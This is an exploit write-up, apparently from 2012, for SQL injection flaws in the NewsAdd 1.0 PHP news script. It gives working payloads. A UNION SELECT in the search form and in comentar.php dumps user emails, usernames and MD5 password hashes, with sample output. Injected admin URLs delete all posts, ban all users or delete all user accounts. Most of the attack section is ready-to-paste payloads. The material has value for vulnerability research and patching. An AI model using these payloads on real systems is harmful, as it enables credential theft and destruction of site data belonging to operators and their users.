# Exploit Title: NewsAdd <=1.0 Multiple SQL Injection # Google Dork: ----------------------------------- # Date: 2012/05/29 # Author: WhiteCollarGroup # Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql # Version: 1.0 # Tested on: Debian GNU/Linux Developer URL: http://tvaini.ueuo.com/ Vulnerabilities discovered by WhiteCollarGroup www.wcgroup.host56.com whitecollar_group@hotmail.com If you install NewsAdd on your system for testing, note that some servers have problems with tabulation. Therefore, replace the second query: --- begin --- CREATE TABLE IF NOT EXISTS 'comentario' ( 'id' int(11) NOT NULL AUTO_INCREMENT, 'id_noticia' int(11) NOT NULL, 'usuario' varchar(15) NOT NULL, 'comentario' text NOT NULL, 'data' datetime NOT NULL, PRIMARY_KEY('id') ) ENGINE=MyISAMDEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ; --- end --- with this: --- begin --- DROP TABLE IF EXISTS `comentario`; CREATE TABLE `comentario` ( `id` int(11) NOT NULL AUTO_INCREMENT, `id_noticia` int(11) NOT NULL, `usuario` varchar(15) NOT NULL, `comentario` text NOT NULL, `data` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; --- end --- We discovered five SQL injection vulnerabilities on public access. Vulnerabilities before login: SQL injection on the search form. The first vulnerability is in the search form on the index page. Paste this into it: %' UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc You will get a single line like: admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0 Rows are separated by commas (",") and columns by "<=>".
In the returned data, there are two rows: admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0 user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0 The columns are as follows: email <=> username <=> md5(password) <=> admin? <=> banned? SQL injection on comments. For this, you must be a registered user. Register via the "cadastro.php" form, then access: http://domain/comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+ You will see a line like the one in the previous example. Vulnerabilities after login: Delete all posts: /admin/removerNoticia.php?id=0' or '1'='1&conf=sim Ban all users: /admin/listarUsuarios.php?acao=banir&id=0' or '1'='1 Delete all users: /admin/removerUsuario.php?id=0' or '1'='1&conf=sim Note that if you delete all users, you will lose access to the system.